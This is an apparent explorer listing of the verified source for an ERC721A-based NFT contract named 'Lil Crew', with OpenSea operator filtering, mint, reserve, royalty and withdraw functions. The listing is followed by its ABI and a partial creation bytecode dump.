                // Mask `to` to the lower 160 bits, in case the upper bits somehow aren't clean.
                toMasked := and(to, _BITMASK_ADDRESS)
                // Emit the `Transfer` event.
                log4(
                    0, // Start of data (0, since no data).
                    0, // End of data (0, since no data).
                    _TRANSFER_EVENT_SIGNATURE, // Signature.
                    0, // `address(0)`.
                    toMasked, // `to`.
                    startTokenId // `tokenId`.
                )

                // The `iszero(eq(,))` check ensures that large values of `quantity`
                // that overflows uint256 will make the loop run out of gas.
                // The compiler will optimize the `iszero` away for performance.
                for {
                    let tokenId := add(startTokenId, 1)
                } iszero(eq(tokenId, end)) {
                    tokenId := add(tokenId, 1)
                } {
                    // Emit the `Transfer` event. Similar to above.
                    log4(0, 0, _TRANSFER_EVENT_SIGNATURE, 0, toMasked, tokenId)
                }
            }
            if (toMasked == 0) revert MintToZeroAddress();

            _currentIndex = end;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * This function is intended for efficient minting only during contract creation.
     *
     * It emits only one {ConsecutiveTransfer} as defined in
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309),
     * instead of a sequence of {Transfer} event(s).
     *
     * Calling this function outside of contract creation WILL make your contract
     * non-compliant with the ERC721 standard.
     * For full ERC721 compliance, substituting ERC721 {Transfer} event(s) with the ERC2309
     * {ConsecutiveTransfer} event is only permissible during contract creation.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {ConsecutiveTransfer} event.
     */
    function _mintERC2309(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();
        if (quantity > _MAX_MINT_ERC2309_QUANTITY_LIMIT) revert MintERC2309QuantityExceedsLimit();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are unrealistic due to the above check for `quantity` to be below the limit.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            emit ConsecutiveTransfer(startTokenId, startTokenId + quantity - 1, address(0), to);

            _currentIndex = startTokenId + quantity;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * See {_mint}.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal virtual {
        _mint(to, quantity);

        unchecked {
            if (to.code.length != 0) {
                uint256 end = _currentIndex;
                uint256 index = end - quantity;
                do {
                    if (!_checkContractOnERC721Received(address(0), to, index++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (index < end);
                // Reentrancy protection.
                if (_currentIndex != end) revert();
            }
        }
    }

    /**
     * @dev Equivalent to `_safeMint(to, quantity, '')`.
     */
    function _safeMint(address to, uint256 quantity) internal virtual {
        _safeMint(to, quantity, '');
    }

    // =============================================================
    //                        BURN OPERATIONS
    // =============================================================

    /**
     * @dev Equivalent to `_burn(tokenId, false)`.
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        address from = address(uint160(prevOwnershipPacked));

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        if (approvalCheck) {
            // The nested ifs save around 20+ gas over a compound boolean condition.
            if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
                if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // Updates:
            // - `balance -= 1`.
            // - `numberBurned += 1`.
            //
            // We can directly decrement the balance, and increment the number burned.
            // This is equivalent to `packed -= 1; packed += 1 << _BITPOS_NUMBER_BURNED;`.
            _packedAddressData[from] += (1 << _BITPOS_NUMBER_BURNED) - 1;

            // Updates:
            // - `address` to the last owner.
            // - `startTimestamp` to the timestamp of burning.
            // - `burned` to `true`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                from,
                (_BITMASK_BURNED | _BITMASK_NEXT_INITIALIZED) | _nextExtraData(from, address(0), prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    // =============================================================
    //                     EXTRA DATA OPERATIONS
    // =============================================================

    /**
     * @dev Directly sets the extra data for the ownership data `index`.
     */
    function _setExtraDataAt(uint256 index, uint24 extraData) internal virtual {
        uint256 packed = _packedOwnerships[index];
        if (packed == 0) revert OwnershipNotInitializedForExtraData();
        uint256 extraDataCasted;
        // Cast `extraData` with assembly to avoid redundant masking.
        assembly {
            extraDataCasted := extraData
        }
        packed = (packed & _BITMASK_EXTRA_DATA_COMPLEMENT) | (extraDataCasted << _BITPOS_EXTRA_DATA);
        _packedOwnerships[index] = packed;
    }

    /**
     * @dev Called during each token transfer to set the 24bit `extraData` field.
     * Intended to be overridden by the cosumer contract.
     *
     * `previousExtraData` - the value of `extraData` before transfer.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _extraData(
        address from,
        address to,
        uint24 previousExtraData
    ) internal view virtual returns (uint24) {}

    /**
     * @dev Returns the next extra data for the packed ownership data.
     * The returned result is shifted into position.
     */
    function _nextExtraData(
        address from,
        address to,
        uint256 prevOwnershipPacked
    ) private view returns (uint256) {
        uint24 extraData = uint24(prevOwnershipPacked >> _BITPOS_EXTRA_DATA);
        return uint256(_extraData(from, to, extraData)) << _BITPOS_EXTRA_DATA;
    }

    // =============================================================
    //                       OTHER OPERATIONS
    // =============================================================

    /**
     * @dev Returns the message sender (defaults to `msg.sender`).
     *
     * If you are writing GSN compatible contracts, you need to override this function.
     */
    function _msgSenderERC721A() internal view virtual returns (address) {
        return msg.sender;
    }

    /**
     * @dev Converts a uint256 to its ASCII string decimal representation.
     */
    function _toString(uint256 value) internal pure virtual returns (string memory str) {
        assembly {
            // The maximum value of a uint256 contains 78 digits (1 byte per digit), but
            // we allocate 0xa0 bytes to keep the free memory pointer 32-byte word aligned.
            // We will need 1 word for the trailing zeros padding, 1 word for the length,
            // and 3 words for a maximum of 78 digits. Total: 5 * 0x20 = 0xa0.
            let m := add(mload(0x40), 0xa0)
            // Update the free memory pointer to allocate.
            mstore(0x40, m)
            // Assign the `str` to the end.
            str := sub(m, 0x20)
            // Zeroize the slot after the string.
            mstore(str, 0)

            // Cache the end of the memory to calculate the length later.
            let end := str

            // We write the string from rightmost digit to leftmost digit.
            // The following is essentially a do-while loop that also handles the zero case.
            // prettier-ignore
            for { let temp := value } 1 {} {
                str := sub(str, 1)
                // Write the character to the pointer.
                // The ASCII index of the '0' character is 48.
                mstore8(str, add(48, mod(temp, 10)))
                // Keep dividing `temp` until zero.
                temp := div(temp, 10)
                // prettier-ignore
                if iszero(temp) { break }
            }

            let length := sub(end, str)
            // Move the pointer 32 bytes leftwards to make room for the length.
            str := sub(str, 0x20)
            // Store the length.
            mstore(str, length)
        }
    }
}


interface IOperatorFilterRegistry {
    function isOperatorAllowed(address registrant, address operator) external view returns (bool);
    function register(address registrant) external;
    function registerAndSubscribe(address registrant, address subscription) external;
    function registerAndCopyEntries(address registrant, address registrantToCopy) external;
    function unregister(address addr) external;
    function updateOperator(address registrant, address operator, bool filtered) external;
    function updateOperators(address registrant, address[] calldata operators, bool filtered) external;
    function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external;
    function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external;
    function subscribe(address registrant, address registrantToSubscribe) external;
    function unsubscribe(address registrant, bool copyExistingEntries) external;
    function subscriptionOf(address addr) external returns (address registrant);
    function subscribers(address registrant) external returns (address[] memory);
    function subscriberAt(address registrant, uint256 index) external returns (address);
    function copyEntriesOf(address registrant, address registrantToCopy) external;
    function isOperatorFiltered(address registrant, address operator) external returns (bool);
    function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool);
    function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool);
    function filteredOperators(address addr) external returns (address[] memory);
    function filteredCodeHashes(address addr) external returns (bytes32[] memory);
    function filteredOperatorAt(address registrant, uint256 index) external returns (address);
    function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32);
    function isRegistered(address addr) external returns (bool);
    function codeHashOf(address addr) external returns (bytes32);
}


/**
 * @title  OperatorFilterer
 * @notice Abstract contract whose constructor automatically registers and optionally subscribes to or copies another
 *         registrant's entries in the OperatorFilterRegistry.
 * @dev    This smart contract is meant to be inherited by token contracts so they can use the following:
 *         - `onlyAllowedOperator` modifier for `transferFrom` and `safeTransferFrom` methods.
 *         - `onlyAllowedOperatorApproval` modifier for `approve` and `setApprovalForAll` methods.
 */
abstract contract OperatorFilterer {
    error OperatorNotAllowed(address operator);

    IOperatorFilterRegistry public constant OPERATOR_FILTER_REGISTRY =
        IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E);

    constructor(address subscriptionOrRegistrantToCopy, bool subscribe) {
        // If an inheriting token contract is deployed to a network without the registry deployed, the modifier
        // will not revert, but the contract will need to be registered with the registry once it is deployed in
        // order for the modifier to filter addresses.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (subscribe) {
                OPERATOR_FILTER_REGISTRY.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy);
            } else {
                if (subscriptionOrRegistrantToCopy != address(0)) {
                    OPERATOR_FILTER_REGISTRY.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy);
                } else {
                    OPERATOR_FILTER_REGISTRY.register(address(this));
                }
            }
        }
    }

    modifier onlyAllowedOperator(address from) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            // Allow spending tokens from addresses with balance
            // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred
            // from an EOA.
            if (from == msg.sender) {
                _;
                return;
            }
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), msg.sender)) {
                revert OperatorNotAllowed(msg.sender);
            }
        }
        _;
    }

    modifier onlyAllowedOperatorApproval(address operator) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), operator)) {
                revert OperatorNotAllowed(operator);
            }
        }
        _;
    }
}

/**
 * @title  DefaultOperatorFilterer
 * @notice Inherits from OperatorFilterer and automatically subscribes to the default OpenSea subscription.
 */
abstract contract TheOperatorFilterer is OperatorFilterer {
    address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6);
    address public owner;

    constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {}
}


contract LilCrew is ERC721A, TheOperatorFilterer {

    string uri = "ipfs://bafybeibkkcrsuecafr53ec4cpsughosmmb5alhe23hfhjel6w5lkegeqgm/";

    uint256 public maxSupply = 400;

    uint256 public mintPrice = 0.002 ether;

    uint256 public maxFreeMintAmountPerTx = 1;

    uint256 public maxMintAmountPerWallet = 10;

    mapping(address => uint256) private _userForFree;

    mapping(uint256 => uint256) private _userMinted;

    function publicMint(uint256 amount) payable public {
        require(totalSupply() + amount <= maxSupply);
        _mint(amount);
    }

    function _mint(uint256 amount) internal {
        if (msg.value == 0) {
            require(amount == 1);
            if (totalSupply() > maxSupply / 5) {
                require(_userMinted[block.number] < FreeNum() 
                && _userForFree[tx.origin] < maxFreeMintAmountPerTx );
                _userForFree[tx.origin]++;
                _userMinted[block.number]++;
            }
            _safeMint(msg.sender, 1);
        } else {
            require(msg.value >= mintPrice * amount);
            _safeMint(msg.sender, amount);
        }
    }

    function reserve(address addr, uint256 amount) public onlyOwner {
        require(totalSupply() + amount <= maxSupply);
        _safeMint(addr, amount);
    }
    
    modifier onlyOwner {
        require(owner == msg.sender);
        _;
    }

    constructor() ERC721A("Lil Crew", "Lc") {
        owner = msg.sender;
        maxMintAmountPerWallet = 10;
    }

    function setURi(string memory u) public onlyOwner {
        uri = u;
    }

    function tokenURI(uint256 tokenId) public view override returns (string memory) {
        return string(abi.encodePacked(uri, _toString(tokenId), ".json"));
    }

    function setFreePerAddr(uint256 maxTx, uint256 maxS) external onlyOwner {
        maxFreeMintAmountPerTx = maxTx;
        maxSupply = maxS;
    }

    function FreeNum() internal returns (uint256){
        return (maxSupply - totalSupply()) / 12;
    }

    function royaltyInfo(uint256 _tokenId, uint256 _salePrice) public view virtual returns (address, uint256) {
        uint256 royaltyAmount = (_salePrice * 50) / 1000;
        return (owner, royaltyAmount);
    }

    function withdraw() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }

    function setApprovalForAll(address operator, bool approved) public override onlyAllowedOperatorApproval(operator) {
        super.setApprovalForAll(operator, approved);
    }

    function approve(address operator, uint256 tokenId) public payable override onlyAllowedOperatorApproval(operator) {
        super.approve(operator, tokenId);
    }

    function transferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.transferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.safeTransferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId, bytes memory data)
        public
        payable
        override
        onlyAllowedOperator(from)
    {
        super.safeTransferFrom(from, to, tokenId, data);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintERC2309QuantityExceedsLimit","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"OwnershipNotInitializedForExtraData","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"fromTokenId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"toTokenId","type":"uint256"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"ConsecutiveTransfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"OPERATOR_FILTER_REGISTRY","outputs":[{"internalType":"contract IOperatorFilterRegistry","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreeMintAmountPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxMintAmountPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"mintPrice","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"publicMint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"addr","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"reserve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"},{"internalType":"uint256","name":"_salePrice","type":"uint256"}],"name":"royaltyInfo","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTx","type":"uint256"},{"internalType":"uint256","name":"maxS","type":"uint256"}],"name":"setFreePerAddr","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"u","type":"string"}],"name":"setURi","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526040518060800160405280604381526020016200380160439139600990816200002e9190620005dc565b50610190600a5566071afd498d0000600b556001600c55600a600d553480156200005757600080fd5b50733cc6cdda760b79bafa08df41ecfa224f810dceb660016040518060400160405280600881526020017f4c696c20437265770000000000000000000000000000000000000000000000008152506040518060400160405280600281526020017f4c630000000000000000000000000000000000000000000000000000000000008152508160029081620000ec9190620005dc565b508060039081620000fe9190620005dc565b506200010f6200035d60201b60201c565b600081905550505060006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156200030c578015620001d2576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16637d3e3dbe30846040518363ffffffff1660e01b81526004016200019892919062000708565b600060405180830381600087803b158015620001b357600080fd5b505af1158015620001c8573d6000803e3d6000fd5b505050506200030b565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16146200028c576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663a0af290330846040518363ffffffff1660e01b81526004016200025292919062000708565b600060405180830381600087803b1580156200026d57600080fd5b505af115801562000282573d6000803e3d6000fd5b505050506200030a565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16634420e486306040518263ffffffff1660e01b8152600401620002d5919062000735565b600060405180830381600087803b158015620002f057600080fd5b505af115801562000305573d6000803e3d6000fd5b505050505b5b5b505033600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600a600d8190555062000752565b600090565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620003e457607f821691505b602082108103620003fa57620003f96200039c565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004647fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000425565b62000470868362000425565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620004bd620004b7620004b18462000488565b62000492565b62000488565b9050919050565b6000819050919050565b620004d9836200049c565b620004f1620004e882620004c4565b84845462000432565b825550505050565b600090565b62000508620004f9565b62000515818484620004ce565b505050565b5b818110156200053d5762000531600082620004fe565b6001810190506200051b565b5050565b601f8211156200058c57620005568162000400565b620005618462000415565b8101602085101562000571578190505b62000589620005808562000415565b8301826200051a565b50505b505050565b600082821c905092915050565b6000620005b16000198460080262000591565b1980831691505092915050565b6000620005cc83836200059e565b9150826002028217905092915050565b620005e78262000362565b67ffffffffffffffff8111156200060357620006026200036d565b5b6200060f8254620003cb565b6200061c82828562000541565b600060209050601f8311600181146200065457600084156200063f578287015190505b6200064b8582620005be565b865550620006bb565b601f198416620006648662000400565b60005b828110156200068e5784890151825560018201915060208501945060208101905062000667565b86831015620006ae5784890151620006aa601f8916826200059e565b8355505b6001600288020188555050505b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620006f082620006c3565b9050919050565b6200070281620006e3565b82525050565b60006040820190506200071f6000830185620006f7565b6200072e6020830184620006f7565b9392505050565b60006020820190506200074c6000830184620006f7565b92915050565b61309f80620007626000396000f3fe60806040526004361061019c5760003560e01c806342842e0e116100ec578063a22cb4651161008a578063c87b56dd11610064578063c87b56dd14610572578063cc47a40b146105af578063d5abeb01146105d8578063e985e9c5146106035761019c565b8063a22cb46514610502578063b88d4fde1461052b578063bc951b91146105475761019c565b80636817c76c116100c65780636817c76c1461044457806370a082311461046f5780638da5cb5b146104ac57806395d89b41146104d75761019c565b806342842e0e146103c0578063604906dc146103dc5780636352211e146104075761019c565b806323b872dd1161015957806338b08fd41161013357806338b08fd41461032c5780633a233f89146103555780633ccfd60b1461037e57806341f43434146103955761019c565b806323b872dd146102b65780632a55205a146102d25780632db11544146103105761019c565b806301ffc9a7146101a1578063028043b1146101de57806306fdde0314610207578063081812fc14610232578063095ea7b31461026f57806318160ddd1461028b575b600080fd5b3480156101ad57600080fd5b506101c860048036038101906101c39190612271565b610640565b6040516101d591906122b9565b60405180910390f35b3480156101ea57600080fd5b506102056004803603810190610200919061241a565b6106d2565b005b34801561021357600080fd5b5061021c61073f565b60405161022991906124e2565b60405180910390f35b34801561023e57600080fd5b506102596004803603810190610254919061253a565b6107d1565b60405161026691906125a8565b60405180910390f35b610289600480360381019061028491906125ef565b610850565b005b34801561029757600080fd5b506102a061095a565b6040516102ad919061263e565b60405180910390f35b6102d060048036038101906102cb9190612659565b610971565b005b3480156102de57600080fd5b506102f960048036038101906102f491906126ac565b610ac1565b6040516103079291906126ec565b60405180910390f35b61032a6004803603810190610325919061253a565b610b12565b005b34801561033857600080fd5b50610353600480360381019061034e91906126ac565b610b3f565b005b34801561036157600080fd5b5061037c60048036038101906103779190612715565b610bab565b005b34801561038a57600080fd5b50610393610c14565b005b3480156103a157600080fd5b506103aa610cb7565b6040516103b791906127b4565b60405180910390f35b6103da60048036038101906103d59190612659565b610cc9565b005b3480156103e857600080fd5b506103f1610e19565b6040516103fe919061263e565b60405180910390f35b34801561041357600080fd5b5061042e6004803603810190610429919061253a565b610e1f565b60405161043b91906125a8565b60405180910390f35b34801561045057600080fd5b50610459610e31565b604051610466919061263e565b60405180910390f35b34801561047b57600080fd5b50610496600480360381019061049191906127cf565b610e37565b6040516104a3919061263e565b60405180910390f35b3480156104b857600080fd5b506104c1610eef565b6040516104ce91906125a8565b60405180910390f35b3480156104e357600080fd5b506104ec610f15565b6040516104f991906124e2565b60405180910390f35b34801561050e57600080fd5b5061052960048036038101906105249190612828565b610fa7565b005b61054560048036038101906105409190612909565b6110b1565b005b34801561055357600080fd5b5061055c611204565b604051610569919061263e565b60405180910390f35b34801561057e57600080fd5b506105996004803603810190610594919061253a565b61120a565b6040516105a691906124e2565b60405180910390f35b3480156105bb57600080fd5b506105d660048036038101906105d191906125ef565b61123e565b005b3480156105e457600080fd5b506105ed6112c7565b6040516105fa919061263e565b60405180910390f35b34801561060f57600080fd5b5061062a60048036038101906106259190612715565b6112cd565b60405161063791906122b9565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061069b57506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806106cb5750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461072c57600080fd5b806009908161073b9190612b8e565b5050565b60606002805461074e906129bb565b80601f016020809104026020016040519081016040528092919081815260200182805461077a906129bb565b80156107c75780601f1061079c576101008083540402835291602001916107c7565b820191906000526020600020905b8154815290600101906020018083116107aa57829003601f168201915b5050505050905090565b60006107dc82611361565b610812576040517fcf4700e400000000000000000000000000000000000000000000000000000000815260040160405180910390fd5b6006600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561094b576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016108c8929190612c60565b602060405180830381865afa1580156108e5573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109099190612c9e565b61094a57806040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161094191906125a8565b60405180910390fd5b5b61095583836113c0565b505050565b6000610964611504565b6001546000540303905090565b8260006daaeb6d7670e5